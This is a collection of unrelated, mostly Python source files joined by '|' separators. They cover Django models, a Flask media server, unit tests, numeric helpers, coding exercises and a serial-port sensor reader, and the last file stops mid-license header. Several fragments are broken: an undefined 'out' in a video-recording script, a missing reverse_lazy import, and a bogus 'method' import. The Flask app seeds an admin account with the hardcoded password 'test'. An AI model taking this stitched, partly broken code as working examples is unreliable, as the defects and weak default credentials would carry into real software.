@Author: Well
@Date: 2013-01-26
"""
#习题13:参数,解包,变量
from sys import argv
# noinspection PyPep8,PyPep8,PyPep8
my_argv_script, my_argv_test1, my_argv_test2, my_argv_test3 = argv
# noinspection PyPep8
print "script", my_argv_script
# noinspection PyPep8
print "test1", my_argv_test1
# noinspection PyPep8
print "test2", my_argv_test2
print "test3", my_argv_test3 |
-X FMLP -Q 0 -L 1 71 300
-X FMLP -Q 0 -L 1 61 400
-X FMLP -Q 0 -L 1 49 150
-X FMLP -Q 1 -L 1 35 125
-X FMLP -Q 1 -L 1 34 175
-X FMLP -Q 1 -L 1 28 150
-X FMLP -Q 2 -L 1 23 100
-X FMLP -Q 2 -L 1 21 250
-X FMLP -Q 2 -L 1 13 125
-X FMLP -Q 3 -L 1 11 125
-X FMLP -Q 3 -L 1 10 100
-X FMLP -Q 3 -L 1 4 250
|
# coding=utf-8
from __future__ import absolute_import, division, print_function
import argparse
import logging
from . import vfp2py
def parse_args(argv=None):
parser = argparse.ArgumentParser(description='Tool for rewriting Foxpro code in Python')
parser.add_argument("--logging", help="output logging information", action='store_true')
parser.add_argument("--profile", help="turn on profiling", action='store_true')
parser.add_argument("--encoding", help="set file encoding", default="cp1252")
parser.add_argument("infile", help="file to convert - supported file types are prg, mpr, spr, scx, vcx, or pjx,", type=str)
parser.add_argument("outpath", help="path to output converted code, will be a filename for all but pjx which will be a directory", type=str)
parser.add_argument("search", help="directory to search for included files", type=str, nargs='*')
return parser.parse_args(argv)
def main(argv=None):
args = parse_args(argv)
if args.logging:
logging.basicConfig(level=logging.DEBUG)
vfp2py.SEARCH_PATH += args.search
if args.profile:
import cProfile
cProfile.runctx('vfp2py.convert_file(args.infile, args.outpath)', globals(), locals())
else:
vfp2py.convert_file(args.infile, args.outpath, encoding=args.encoding)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
|
from django.db import models
import datetime
from django.contrib.auth.models import User
from django.db.models.fields import NullBooleanField
from django.db.models.fields.related import OneToOneField
from django.utils.tree import Node
from jsonfield import JSONField
from typing_extensions import runtime
# Create your models here.
class userdata(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name="userdata")
correct = models.IntegerField(default=0)
incorrect = models.IntegerField(default=0)
runtime = models.IntegerField(default=0)
timelimit = models.IntegerField(default=0)
tags = JSONField(default={"isnull": True})
notifications = JSONField(default={"isnull": True})
def __str__(self):
return f'{self.user}'
class Contest(models.Model):
name = models.CharField(max_length=20)
start_time = models.DateTimeField()
end_time = models.DateTimeField()
participants = models.ManyToManyField(User, related_name="contests")
def __str__(self) -> str:
return f"{self.name}"
class Blog(models.Model):
author = models.ForeignKey(User, on_delete=models.CASCADE, related_name="blogs")
name = models.CharField(max_length=20)
statement = models.TextField()
contest = OneToOneField(Contest, on_delete=models.CASCADE, related_name="blog")
date = models.DateField(auto_now=True)
timestamp = models.TimeField(auto_now=True)
def __str__(self):
return f'{self.name}'
class Tag(models.Model):
name = models.CharField(max_length=20)
def __str__(self):
return f"{self.name}"
class Question(models.Model):
author = models.ForeignKey(User, on_delete=models.CASCADE, related_name="questions")
name = models.CharField(max_length=10)
statement = models.TextField()
tags = models.ManyToManyField(Tag, blank=True, related_name="questions")
contest = models.ForeignKey(Contest, blank=True, on_delete=models.CASCADE, related_name="questions")
timelimit = models.DecimalField(max_digits=6, decimal_places=3, default=1)
memlimit = models.IntegerField(default=128)
def __str__(self):
return f"{self.name}"
class Testcase(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name="testcases")
testcase = models.TextField()
answer = models.TextField()
def __str__(self):
return f'{self.question.name}'
class Submission(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name="submissions")
ques = models.ForeignKey(Question, on_delete=models.CASCADE, related_name="submissions")
code = models.TextField()
lang = models.CharField(max_length=10)
verdict = models.CharField(max_length=50, default="Queued...")
def __str__(self):
return f'{self.user} ----> {self.ques}' |
import meinheld_zeromq as zmq
import meinheld.server
import greenlet
ctx = zmq.Context()
main_greenlet = greenlet.getcurrent()
def sleep(secs):
meinheld.schedule_call(secs, greenlet.getcurrent().switch)
main_greenlet.switch()
def pingpong():
sock = ctx.socket(zmq.REQ)
sock.connect('tcp://127.0.0.1:10000')
while True:
sleep(1)
sock.send(b'hello')
print sock.recv()
def dummy_app(env, start):
sock = ctx.socket(zmq.REQ)
sock.connect('tcp://127.0.0.1:10000')
sock.send(env['PATH_INFO'])
msg = sock.recv()
start("200 OK", [('Content-Type', 'text/plain'), ('Content-Length', str(len(msg)))])
return [msg]
meinheld.spawn(pingpong)
meinheld.listen(("127.0.0.1", 10001))
meinheld.run(dummy_app)
|
import argparse
import csv
import torch
import transformers
def parse_arguments():
parser = argparse.ArgumentParser(description="MiniConf Portal Command Line")
parser.add_argument("papers", default=False, help="papers file to parse")
return parser.parse_args()
if __name__ == "__main__":
args = parse_arguments()
tokenizer = transformers.AutoTokenizer.from_pretrained("deepset/sentence_bert")
model = transformers.AutoModel.from_pretrained("deepset/sentence_bert")
model.eval()
with open(args.papers, "r") as f:
abstracts = list(csv.DictReader(f))
all_abstracts = torch.zeros(len(abstracts), 768)
with torch.no_grad():
for i, row in enumerate(abstracts):
input_ids = torch.tensor([tokenizer.encode(row["abstract"])[:512]])
all_hidden_states, _ = model(input_ids)[-2:]
all_abstracts[i] = all_hidden_states.mean(0).mean(0)
print(i)
torch.save(all_abstracts, "embeddings.torch")
|
# Refaça o desafio 035 dos triangulos acrescentando o recurso de mostrar que tipo de triangulo será formado:
# EQUILÁTERO: Todos os lados são iguais
# ISÓSCELES: 2 lados iguais
# ESCALENO: todos os lados são diferentes
retaA = float(input("Digite o comprimento da primeira reta: "))
retaB = float(input("Digite o comprimento da segunda reta: "))
retaC = float(input("Digite o comprimento da terceira reta: "))
formaTrianguloA = False
formaTrianguloB = False
formaTrianguloC = False
if abs(retaB - retaC) < retaA < (retaB + retaC):
formaTrianguloA = True
if abs(retaA - retaC) < retaB < (retaA + retaC):
formaTrianguloB = True
if abs(retaA - retaB) < retaC < (retaA + retaB):
formaTrianguloC = True
if formaTrianguloA and formaTrianguloB and formaTrianguloC == True:
if retaA == retaB and retaB == retaC:
print("Estes 3 segmentos podem formar um triângulo")
print("O tipo de trinângulo formado é: EQUILÁTERO")
elif retaA == retaB or retaB == retaC or retaA == retaC:
print("Estes 3 segmentos podem formar um triângulo")
print("O tipo de trinângulo formado é: ISÓSCELES")
else:
print("Estes 3 segmentos podem formar um triângulo")
print("O tipo de trinângulo formado é: ESCALENO")
else:
print("Estes 3 segmentos NÃO podem formar um triângulo") |
import numpy as np
class P_controller:
def __init__(self, environment, AGENT_PARAMS, i):
self.z_nom = AGENT_PARAMS["INIT_POSITION"]
self.tank = environment.tanks[i]
self.h_set = AGENT_PARAMS["SS_POSITION"] * environment.tanks[i].h
self.k = self.tank.init_l / self.z_nom
self.tau1 = (np.pi * self.tank.r) / (
self.tank.init_l * self.tank.A_pipe * 2 * 9.81
)
self.tau_c = AGENT_PARAMS["TAU_C"]
self.evalv_kc(self.tau_c)
self.action_deley = AGENT_PARAMS["ACTION_DELAY"]
self.action = AGENT_PARAMS["INIT_POSITION"]
self.action_buffer = 99999
def get_z(self, h):
if self.action_buffer > self.action_deley:
delta_h = h - self.h_set
z = delta_h * self.Kc + self.z_nom
z = 1 if z > 1 else z
z = 0 if z < 0 else z
self.action = z
self.action_buffer = 0
else:
self.action_buffer += 1
return self.action
def evalv_kc(self, tau_c):
self.Kc = self.k / (self.tau1 * tau_c)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2018-04-12 09:47
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('cms_test2', '0006_auto_20180412_0942'),
]
operations = [
migrations.CreateModel(
name='MovieInfo',
fields=[
('movie_info_id', models.AutoField(primary_key=True, serialize=False)),
],
),
migrations.CreateModel(
name='MovieLangPack',
fields=[
('movie_langpack_id', models.AutoField(primary_key=True, serialize=False)),
('is_default', models.PositiveIntegerField(blank=True, choices=[(0, 'not default language'), (1, 'is default language')], null=True)),
('title', models.CharField(blank=True, max_length=100, null=True)),
('description', models.CharField(blank=True, max_length=1000, null=True)),
('actors', models.ManyToManyField(related_name='_movielangpack_actors_+', to='cms_test2.Actor')),
('directors', models.ManyToManyField(related_name='_movielangpack_directors_+', to='cms_test2.Director')),
('language', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cms_test2.Language')),
('movie_info', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cms_test2.MovieInfo')),
('thumbnails', models.ManyToManyField(related_name='_movielangpack_thumbnails_+', to='cms_test2.Thumbnail')),
],
),
migrations.AddField(
model_name='video',
name='episode_info',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='cms_test2.EpisodeInfo'),
),
]
|
from os import getenv, path, mkdir, sys, unlink, listdir, stat
# workaround to allow flask to find modules
CUR_DIR = path.dirname(path.abspath(__file__))
sys.path.append(path.dirname(CUR_DIR+"/"))
from flask import Flask, Response, request, cli, g, send_file, send_from_directory
from flask_cors import CORS
import sqlalchemy
from sqlalchemy.sql import text
import datetime
from db import *
from utils import *
from auth import *
import users, files, playlists, categories, comments, keywords, messages
from response import ResponseObject as JSONResponse
# NOTES:
# flask g is for storing data during requests like a temp global dictionary
app = Flask(__name__)
app.register_blueprint(bpAdmin)
app.register_blueprint(bpLogin)
app.register_blueprint(users.bp)
app.register_blueprint(files.bp)
app.register_blueprint(playlists.bp)
app.register_blueprint(categories.bp)
app.register_blueprint(comments.bp)
app.register_blueprint(keywords.bp)
app.register_blueprint(messages.bp)
CORS(app, methods=['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'PATCH', 'LINK', 'UNLINK'])
ERR_IN_CREATE = False
FIX_ERR_IN_CREATE = True
def configure_app():
configs = {
'production': 'config.ProductionCfg',
'dev': 'config.DevCfg',
'test': 'config.TestCfg',
'default': 'config.DevCfg'
}
cfg_name = getenv('SERVER_CFG') or 'default'
app.config.from_object(configs[cfg_name])
if not path.exists(app.config['UPLOAD_DIR']):
mkdir(app.config['UPLOAD_DIR'])
db.init_app(app)
create_db()
def create_db():
global ERR_IN_CREATE
with app.app_context():
try:
db.create_all()
admin = Admin.query.filter_by(username='admin').first()
if not admin:
admin = Admin(username='admin',password='test')
db.session.add(admin)
db.session.commit()
except sqlalchemy.exc.InternalError as err:
isFatal = not FIX_ERR_IN_CREATE or ERR_IN_CREATE
if not FIX_ERR_IN_CREATE:
print("Will not try to fix")
elif ERR_IN_CREATE:
print("Could not be fixed")
print(err)
if isFatal:
print("Fatal, exiting")
exit()
# print(err._sql_message()) TMI message
print("Error:",err._message(),"\nTrying to fix, recreating database")
ERR_IN_CREATE = True
recreate_db()
finally:
admin = Admin.query.filter_by(username='admin').first()
if not admin:
admin = Admin(username='admin',password='test')
db.session.add(admin)
db.session.commit()
def clear_file_store():
folder = app.config['UPLOAD_DIR']
for file in listdir(folder):
file_path = path.join(folder, file)
try:
if path.isfile(file_path):
unlink(file_path)
except Exception as e:
print('clear_file_store error',e)
def clear_db():
with app.app_context():
t_id = db.session.connection().connection.thread_id()
print(t_id,'session commit')
db.session.commit()
t_id = db.session.connection().connection.thread_id()
result = db.engine.execute('show variables where variable_name="FOREIGN_KEY_CHECKS"')
data = get_query_data(result)[0]
message = "Foreign checks are off for current session, drop statement may succeed" if data['Value'] == 'OFF' else "Foreign checks are on"
print(t_id,message,data)
t_id = db.session.connection().connection.thread_id()
print(t_id,'Turning foreign checks off')
db.engine.execute('set FOREIGN_KEY_CHECKS=0')
t_id = db.session.connection().connection.thread_id()
result = db.engine.execute('show variables where variable_name="FOREIGN_KEY_CHECKS"')
data = get_query_data(result)[0]
message = "Successfully turned off, drop statement should succeed" if data['Value'] == 'OFF' else "Failed to turn off, drop statement may error"
print(t_id,message,data)
t_id = db.session.connection().connection.thread_id()
print(t_id,'Dropping all tables')
db.drop_all()
clear_file_store()
db.engine.execute('set FOREIGN_KEY_CHECKS=1')
def recreate_db():
global ERR_IN_CREATE
clear_db()
create_db()
if ERR_IN_CREATE:
print("Successfully fixed error")
ERR_IN_CREATE = False
@app.route('/')
def index():
return "OK"
@app.route('/db',methods=['DELETE'])
@admin_auth.login_required
def delete_db():
recreate_db()
return "OK"
@app.after_request
def add_accept_ranges(response):
response.headers.add('Accept-Ranges','bytes')
return response
cli.load_dotenv()
configure_app()
# flask run ignores app.run
if __name__ == "__main__":
if app.config['SERVE_PUBLIC']:
app.run(host='0.0.0.0')
else:
app.run()
|
from django.db import models
class Author(models.Model):
name = models.CharField(max_length=200)
class Book(models.Model):
title = models.CharField(max_length=200)
published = models.DateField()
author = models.ForeignKey(Author, on_delete=models.CASCADE)
|
import multiprocessing
import Tkinter as tk
import cv2
e = multiprocessing.Event()
p = None
# -------begin capturing and saving video
def startrecording(e):
cap = cv2.VideoCapture(0)
while(cap.isOpened()):
if e.is_set():
cap.release()
out.release()
cv2.destroyAllWindows()
e.clear()
ret, frame = cap.read()
if ret==True:
out.write(frame)
else:
break
def start_recording_proc():
global p
p = multiprocessing.Process(target=startrecording, args=(e,))
p.start()
# -------end video capture and stop tk
def stoprecording():
e.set()
p.join()
root.quit()
root.destroy()
if __name__ == "__main__":
# -------configure window
root = tk.Tk()
root.geometry("%dx%d+0+0" % (100, 100))
startbutton=tk.Button(root,width=10,height=1,text='START',command=start_recording_proc)
stopbutton=tk.Button(root,width=10,height=1,text='STOP', command=stoprecording)
startbutton.pack()
stopbutton.pack()
# -------begin
root.mainloop()
|
#!/usr/bin/env python2.6
import logging
import unittest
if __name__ == '__main__':
logging.basicConfig(level=logging.CRITICAL)
# logging.basicConfig(level=logging.DEBUG)
unittest.main()
|
#!/usr/bin/python3
import sys
from importlib import import_module
mod = import_module(sys.argv[1] + '.' + sys.argv[1])
run = getattr(mod,'run')
run(True)
|
"""Rejestracja URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views as auth_views
from remote_registration.views import *
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('remote_registration.urls')),
url(r'^login/$', LoginView.as_view(), name='login'),
url(r'^logout/$', LogoutView.as_view(), name='logout'),
url(r'^user/details/$', UserDetailView.as_view(), name='user_details'),
url(r'^user/add/$', AddUserView.as_view(), name='user_add'),
url(r'^user/update/$', UpdateUserView.as_view(), name='user_update'),
url(r'^user/update/password/$', ChangePasswordView.as_view(), name='user_update_password'),
url(r'^user/reset/password/$', auth_views.PasswordResetView.as_view(template_name='remote_registration/reset_password.html',
success_url=reverse_lazy('user_reset_password_done')),
name='user_reset_password'),
url(r'^user/reset/password/done/$', auth_views.PasswordResetDoneView.as_view(), name='user_reset_password_done'),
url(r'^user/reset/password/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/$', auth_views.PasswordResetConfirmView.as_view(), name='password_reset_confirm'),
url(r'^user/reset/password/complete/$', auth_views.PasswordResetCompleteView.as_view(), name='password_reset_complete'),
#
]
|
# pylint: disable=missing-docstring
import doctest
import re
from unittest import TestCase
import awking
from awking import (LazyRecord, RangeGrouper, _ensure_predicate, _make_columns,
records)
class TestEnsurePredicate(TestCase):
def test_string(self):
predicate = _ensure_predicate('^a')
self.assertTrue(callable(predicate))
def test_regexp(self):
predicate = _ensure_predicate(re.compile('^a'))
self.assertTrue(callable(predicate))
def test_function(self):
# noinspection PyUnusedLocal
# pylint: disable=unused-argument
def func(param):
return True
predicate = _ensure_predicate(func)
self.assertTrue(callable(predicate))
def test_invalid(self):
with self.assertRaises(TypeError):
_ensure_predicate(5)
class TestRangeGrouper(TestCase):
def test_one_group(self):
grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
[1, 2, 5, 3, 5])
self.assertEqual([[2, 5, 3]], [list(x) for x in grouper])
def test_two_groups(self):
grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
[1, 2, 5, 3, 5, 2, 4, 4, 3])
self.assertEqual([[2, 5, 3], [2, 4, 4, 3]],
[list(x) for x in grouper])
def test_no_match(self):
grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
[1, 4, 0, 1])
self.assertEqual([], [list(x) for x in grouper])
def test_outer_iteration(self):
grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
[1, 2, 5, 3, 5, 2, 4, 4, 3, 6])
group1 = next(grouper)
group2 = next(grouper)
with self.assertRaises(StopIteration):
next(grouper)
self.assertEqual([2, 5, 3], list(group1))
self.assertEqual([2, 4, 4, 3], list(group2))
def test_regexp(self):
grouper = RangeGrouper(re.compile('a'), re.compile('b'),
'xf ga zu jd bq zu aa qa gb'.split())
self.assertEqual([['ga', 'zu', 'jd', 'bq'], ['aa', 'qa', 'gb']],
[list(x) for x in grouper])
def test_double_start(self):
grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
[1, 2, 2, 5, 3, 5, 2, 4, 4, 3])
self.assertEqual([[2, 2, 5, 3], [2, 4, 4, 3]],
[list(x) for x in grouper])
def test_double_end(self):
grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
[1, 2, 5, 3, 3, 5, 2, 4, 4, 3])
self.assertEqual([[2, 5, 3], [2, 4, 4, 3]],
[list(x) for x in grouper])
def test_one_item_group(self):
grouper = RangeGrouper(lambda x: x == 2, lambda x: x % 2 == 0,
[1, 2, 5, 3, 3, 5, 4, 3])
self.assertEqual([[2]], [list(x) for x in grouper])
def test_truncated_last_group(self):
grouper = RangeGrouper(lambda x: x == 2, lambda x: x == 3,
[1, 2, 5, 3, 3, 5, 2, 4, 4])
self.assertEqual([[2, 5, 3], [2, 4, 4]],
[list(x) for x in grouper])
class TestLazyRecord(TestCase):
def test_ellipsis(self):
text = 'abc def jkzzz'
record = LazyRecord(text, lambda x: x.split())
self.assertEqual(text, record[...])
def test_numerical_indices(self):
text = 'abc def jkzzz'
record = LazyRecord(text, lambda x: x.split())
self.assertEqual(('abc', 'jkzzz', 'jkzzz'),
(record[0], record[2], record[-1]))
def test_out_of_range(self):
text = 'abc def jkzzz'
record = LazyRecord(text, lambda x: x.split())
self.assertEqual(3, len(record))
with self.assertRaises(IndexError):
# noinspection PyStatementEffect
# pylint: disable=pointless-statement
record[3]
def test_full_range(self):
text = 'abc def jkzzz'
record = LazyRecord(text, lambda x: x.split())
self.assertEqual(['abc', 'def', 'jkzzz'], record[:])
def test_str(self):
text = 'abc def jkzzz'
record = LazyRecord(text, lambda x: x.split())
self.assertEqual(text, str(record))
class TestMakeColumns(TestCase):
def test_one(self):
self.assertEqual([(0, 5)], _make_columns([5]))
def test_two(self):
self.assertEqual([(0, 3), (3, 5)], _make_columns([3, 2]))
def test_tail(self):
self.assertEqual([(0, 3), (3, 5), (5, None)],
_make_columns([3, 2, ...]))
class TestRecords(TestCase):
def test_blank(self):
lines = ['abc def jkzzz']
self.assertEqual(['abc', 'def', 'jkzzz'], next(records(lines))[:])
def test_separator(self):
lines = ['abx-something--rrr']
self.assertEqual(['abx', 'something', '', 'rrr'],
next(records(lines, separator='-'))[:])
def test_regexp(self):
lines = ['abx-something--rrr']
self.assertEqual(['abx', 'something', 'rrr'],
next(records(lines, separator=re.compile('-+')))[:])
def test_widths(self):
lines = ['abx-something--rrr']
self.assertEqual(['abx', '-somet', 'hing--', 'rrr'],
next(records(lines, widths=[3, 6, 6, 3]))[:])
def test_widths_with_tail(self):
lines = ['abx-something--rrr']
self.assertEqual(['abx', '-somet', 'hing--', 'rrr'],
next(records(lines, widths=[3, 6, 6, ...]))[:])
def test_pattern(self):
lines = ['abx-something--rrr']
self.assertEqual(['abx', 'something', 'rrr'],
next(records(lines, pattern='[a-z]+'))[:])
def test_pattern_regexp(self):
lines = ['abx-something--rrr']
self.assertEqual(['abx', 'something', 'rrr'],
next(records(lines, pattern=re.compile('[a-z]+')))[:])
# noinspection PyUnusedLocal
# pylint: disable=unused-argument
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(awking))
return tests
|
###############################
# This file is part of PyLaDa.
#
# Copyright (C) 2013 National Renewable Energy Lab
#
# PyLaDa is a high throughput computational platform for Physics. It aims to make it easier to submit
# large numbers of jobs on supercomputers. It provides a python interface to physical input, such as
# crystal structures, as well as to a number of DFT (VASP, CRYSTAL) and atomic potential programs. It
# is able to organise and launch computational jobs on PBS and SLURM.
#
# PyLaDa is free software: you can redistribute it and/or modify it under the terms of the GNU General
# Public License as published by the Free Software Foundation, either version 3 of the License, or (at
# your option) any later version.
#
# PyLaDa is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
# the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along with PyLaDa. If not, see
# <http://www.gnu.org/licenses/>.
###############################
def into_cell(position, cell, inverse=None):
""" Returns Folds vector into periodic the input cell
:param position:
Vector/position to fold back into the cell
:param cell:
The cell matrix defining the periodicity
:param invcell:
Optional. The *inverse* of the cell defining the periodicity. It is
computed if not given on input.
"""
from numpy import dot, floor
from numpy.linalg import inv
if inverse is None:
inverse = inv(cell)
result = dot(inverse, position)
return dot(cell, result - floor(result + 1e-12))
def zero_centered(position, cell, inverse=None):
""" Folds vector back to origin
This may not be the vector with the smallest possible norm if the cell
is very skewed
:param position:
Vector/position to fold back into the cell
:param cell:
The cell matrix defining the periodicity
:param invcell:
Optional. The *inverse* of the cell defining the periodicity. It is
computed if not given on input.
"""
from numpy import dot, floor, abs
from numpy.linalg import inv
if inverse is None:
inverse = inv(cell)
result = dot(inverse, position)
result -= floor(result + 0.5 + 1e-12)
for i in range(result.size):
if abs(result[i] - 0.5) < 1e-12:
result[i] = -0.5
elif result[i] < -0.5:
result[i] += 1e0
return dot(cell, result)
def into_voronoi(position, cell, inverse=None):
""" Folds vector into first Brillouin zone of the input cell
Returns the periodic image with the smallest possible norm.
:param position:
Vector/position to fold back into the cell
:param cell:
The cell matrix defining the periodicity
:param invcell:
Optional. The *inverse* of the cell defining the periodicity. It is
computed if not given on input.
"""
from numpy import dot, floor
from numpy.linalg import inv, norm
if inverse is None:
inverse = inv(cell)
center = dot(inverse, position)
center -= floor(center)
result = center
n = norm(dot(cell, center))
for i in range(-1, 2, 1):
for j in range(-1, 2, 1):
for k in range(-1, 2, 1):
translated = [i, j, k] + center
n2 = norm(dot(cell, translated))
if n2 < n:
n = n2
result = translated
return dot(cell, result)
def are_periodic_images(pos0, pos1, invcell=None, cell=None, tolerance=1e-8):
""" True if two vector are periodic images of one another
:param pos0:
First position
:param pos1:
Second position
:param invcell:
The *inverse* of the cell defining the periodicity
:param cell:
The cell defining the periodicity
:param tolerance:
Fuzzy tolerance criteria
Only one of cell and invcell need be given.
"""
from numpy import dot, floor
from numpy.linalg import inv, norm
from method import error
if invcell is None:
if cell is None:
raise error.ValueError("One of cell or invcell should be given")
invcell = inv(cell)
result = dot(invcell, pos0 - pos1)
result -= floor(result + tolerance)
return all(abs(result) < tolerance)
|
#!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'getWays' function below.
#
# The function is expected to return a LONG_INTEGER.
# The function accepts following parameters:
# 1. INTEGER n
# 2. LONG_INTEGER_ARRAY c: contain values of coins
#
def dyn_get_ways(n, coins):
# Overlap can also happen, as we may need to compute getWays(k, c) twice,
# so we need to avoid it via dynamic programming,
# ie. use an array to store values already computed and we go from small to large amount
# for 0 <= i <= n and 1 <= k <= m,
# let ways[i, k] = number of ways to change amount i using k last coins,
# then what we need is ways[n, m]
# ways[i, k] = sum_j ways[i - coins[-j], j], for j in [1:k]
print('sorted coins:', coins)
m = len(coins)
# ways = np.zeros((n+1, m))
rows, cols = n + 1, m + 1
ways = [[0 for i in range(cols)] for j in range(rows)]
ways[0] = [1] * (m + 1)
min_coin = coins[0]
for i in range(min_coin, n + 1):
for k in range(1, m + 1):
for j in range(1, k + 1):
if not (coins[-j] > i):
ways[i][k] += ways[i - coins[-j]][j]
return ways[n][m]
def getWays(n, coins):
# the first coin can be any value not exceeding n, say c[i],
# then remaining coins must sum to n - c[i], so have getWays(n - c[i], c)
# so fnal result is sth like sum_i getWays(n - c[i], c).
# But there can be dups, eg. (1, 2) and (2, 1) is same way. how to rm dups?
# One way is to make sure a non-decreasing order in values of coins used,
# ie. once we use coin c[i], we do not use a coin of less value,
# so, we need to remove from c the coins of values smaller than c[i], and
# get c\{c[j]: j < i} (assume that the coins already sorted).
# So formula should be: sum_i getWays(n - c[i], c\{c[j]: j < i})
sorted_coins = sorted(coins)
return dyn_get_ways(n, sorted_coins)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
first_multiple_input = input().rstrip().split()
n = int(first_multiple_input[0])
m = int(first_multiple_input[1])
c = list(map(int, input().rstrip().split()))
# Print the number of ways of making change for 'n' units using coins having the values given by 'c'
ways = getWays(n, c)
fptr.write(str(ways) + '\n')
fptr.close()
|
import urllib.request
rawdata = urllib.request.urlopen('http://www.google.cn/').read()
import chardet
print(chardet.detect(rawdata)) |
"""
# 使用viewset代替
from rest_framework import generics
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .models import Post
from .serializers import PostSerializer
@api_view(["GET"])
def post_list(request):
queryset = Post.objects.filter(status=Post.STATUS_NORMAL)
post_serializers = PostSerializer(queryset, many=True)
return Response(post_serializers.data)
class PostList(generics.ListCreateAPIView):
queryset = Post.objects.filter(status=Post.STATUS_NORMAL)
serializer_class = PostSerializer
"""
from rest_framework import viewsets
from rest_framework.permissions import IsAdminUser
from .models import Post, Category, Tag
from .serializers import (
PostSerializer, PostDetailSerializer,
CategorySerializer, CategoryDetailSerializer,
TagSerializer, TagDetailSerializer,
)
# class PostViewSet(viewsets.ReadOnlyModelViewSet):
class PostViewSet(viewsets.ModelViewSet):
"""接口集"""
queryset = Post.objects.filter(status=Post.STATUS_NORMAL)
serializer_class = PostSerializer
# 只有admin user才能够访问该api viewset
# permission_classes = IsAdminUser
def retrieve(self, request, *args, **kwargs):
self.serializer_class = PostDetailSerializer
return super().retrieve(request, *args, **kwargs)
# 获取某个分类下的所有文章,通过query string来过滤queryset
def filter_queryset(self, queryset):
"""
filter_queryset的缺点是则无法取到category的字段信息。
即文章资源的获取与其所属分类数据的获取是割裂的。
"""
catetory_id = self.request.query_params.get("category")
if catetory_id:
queryset = queryset.filter(category__id=catetory_id)
return queryset
# 通过CategoryDetailSerializer获取某个分类下的所有文章
class CategoryViewSet(viewsets.ReadOnlyModelViewSet):
queryset = Category.objects.filter(status=Category.STATUS_NORMAL)
serializer_class = CategorySerializer
def retrieve(self, request, *args, **kwargs):
"""post文章的获取与其所属category分类的数据都可以取回来"""
self.serializer_class = CategoryDetailSerializer
return super().retrieve(request, *args, **kwargs)
class TagViewSet(viewsets.ReadOnlyModelViewSet):
queryset = Tag.objects.filter(status=Tag.STATUS_NORMAL)
serializer_class = TagSerializer
def retrieve(self, request, *args, **kwargs):
self.serializer_class = TagDetailSerializer
return super().retrieve(request, *args, **kwargs)
|
"""
Aqui se implemento tomar 16 mediciones para tener un promedio del infrarrojo
"""
import serial
import matplotlib.pyplot as plt
import numpy as np
import time
def open_port():
ser = serial.Serial('COM8', 38400)
return ser
def close_port(port):
port.close()
def detect_data(port):
packet_size = 0
Trama_Camara = np.ones(packet_size+4, dtype="uint8")
Trama_Camara[0] = 0xff
Trama_Camara[1] = 0x00
Trama_Camara[2] = 0
Trama_Camara[3] = 0x03 #comando ADC
port.write(bytearray(Trama_Camara))
while True:
anuncio = port.read(1)
anuncio = ord(anuncio) # convertir en entero
if anuncio == 0xff:# Se detecta el byte de anuncio de trama
n_bytes = port.read(1)
ADC_up = port.read(1)
ADC_low = port.read(1)
ADC = (2 ** 7) * ord(ADC_up) + ord(ADC_low)
break
return ADC
def main():
port = open_port()
i = 0.00
y = 0.00
print("Inicio")
Amplitud_matrix = np.array([])
Time_matrix = np.array([])
T_Inicio = time.time()
T_Final = time.time()
Dif = T_Final-T_Inicio
poly_infra = np.loadtxt('../Calibracion/Polinomio_Ajuste_Infra2.out')
poly = np.poly1d(poly_infra)
while(Dif < 1):
ADC = detect_data(port)
ti = time.time()- T_Inicio
Time_matrix = np.append(Time_matrix, [ti])
y = ADC*3.1/(2**12-1) # Escalamiento, el voltaje de ref de adc es 3.1
Amplitud_matrix = np.append(Amplitud_matrix, [y])
Valor_min = Amplitud_matrix[np.argmin(Amplitud_matrix, 0)]
indices, = np.where(Amplitud_matrix < (Valor_min + Valor_min * 0.1))
T_filtrado = np.array([])
Amplitud_filtrada = np.array([])
for i in indices:
T_filtrado = np.append(T_filtrado, [Time_matrix[i]])
Amplitud_filtrada = np.append(Amplitud_filtrada, [Amplitud_matrix[i]])
T_Final = time.time()
Dif = T_Final - T_Inicio
print(poly(np.mean(Amplitud_filtrada)))
if __name__ == "__main__": main() |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2014 Lukas Kemmer
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
